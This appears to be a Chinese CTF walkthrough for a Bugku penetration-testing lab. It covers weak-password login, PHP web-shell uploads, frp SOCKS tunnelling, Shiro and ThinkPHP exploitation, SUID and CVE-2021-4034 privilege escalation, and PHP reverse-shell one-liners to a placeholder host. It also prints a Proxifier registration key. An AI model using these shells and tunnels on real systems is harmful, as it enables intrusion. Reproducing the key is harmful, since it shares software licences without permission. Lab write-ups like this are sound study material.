bugku渗透测试1 WP

bugku渗透测试1 WP

利用fscan对主站进行扫描

flag1

flag2
在url中输入http://xxx/admin会跳转到登录页面,弱口令admin admin


提示/home
flag3
在上传后缀这里添加php,点击立即提交


回到前台,点击php教程,点击运行预览



然后输入一句话木马,f12在网络中看到了.php,但这个.php很快就会掉线,所以用这种木马

<?php fwrite(fopen('shell.php','w'),'<?php eval($_POST[shell]);?>');?>

蚁剑连接

在/home/ctf下找到flag,提示flag在数据库中

flag4
使用蚁剑上传哥斯拉的木马


配置数据库,得到提示nc root



flag5 不会pwn,先跳过
flag6
查看内网ip

上传fscan进行扫描

利用frp和proxifier进行socks5代理
在vps上传frps和frps.ini,frps.ini类似如下,其中密码要强密码

[common]
Bind_addr = 0.0.0.0
bind_port = 7000
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = xxx
authentication_timeout = 0
max_pool_count = 50
allow_ports = 40000-50000

执行

chmod +x frps
./frps -c frps.ini

利用蚁剑上传frpc和frpc.ini
如果文件太大无法上传可以分成小块上传或者wget远程下载

[common]
server_addr = xxx
server_port = 7000
tls_enable = true
pool_count = 5

[plugin_socks]
type = tcp
remote_port = 46075
plugin = socks5
use_encryption = true
use_compression = true

执行

chmod +x frpc
./frpc -c frpc.ini

下载https://www.proxifier.com/
然后配置proxifier
激活
用户名：zxhi
注册码：LYZGL-F2KX3-JW5W4-A33MC-25QHH




访问http://192.168.0.1:8080/robots.txt
flag7
cat /home/flag

flag8
shiro的漏洞,利用工具梭哈

注入哥斯拉内存马,连接


发现存在suid的find提权


读到/root下的flag
确定内网ip为192.168.0.3

flag9
使用thinkphp漏洞利用工具

getshell,注意$前面的反斜杠


在/var/www/html目录下,得到提示在数据库中

flag10
先读数据库配置文件
在/var/www/html/application/database.php

上传哥斯拉的php的shell


在数据库中找到flag,得到提示:提权

flag11
反弹shell
经过测试php -r 的方法好像不行

php -r '$sock=fsockopen("xxx",6666);system("/bin/bash -i <&3 >&3 2>&3");'

把

<?php $sock=fsockopen("xxx",6666);exec("/bin/bash -i <&3 >&3 2>&3");?>

写到一个文件里,然后上传,然后执行

php x.php

成功反弹了shell
提权 https://github.com/berdav/CVE-2021-4034
这里可以利用如下命令提高shell的交互性

python3 -c 'import pty; pty.spawn("/bin/bash")'

后续处理:
1.关掉frpc服务,不让其一直连接

ps -aux | grep frp > 1.txt
cat 1.txt
kill -9 xxx

2.删掉frpc,frpc.ini,fscan等工具,特别是fprc.ini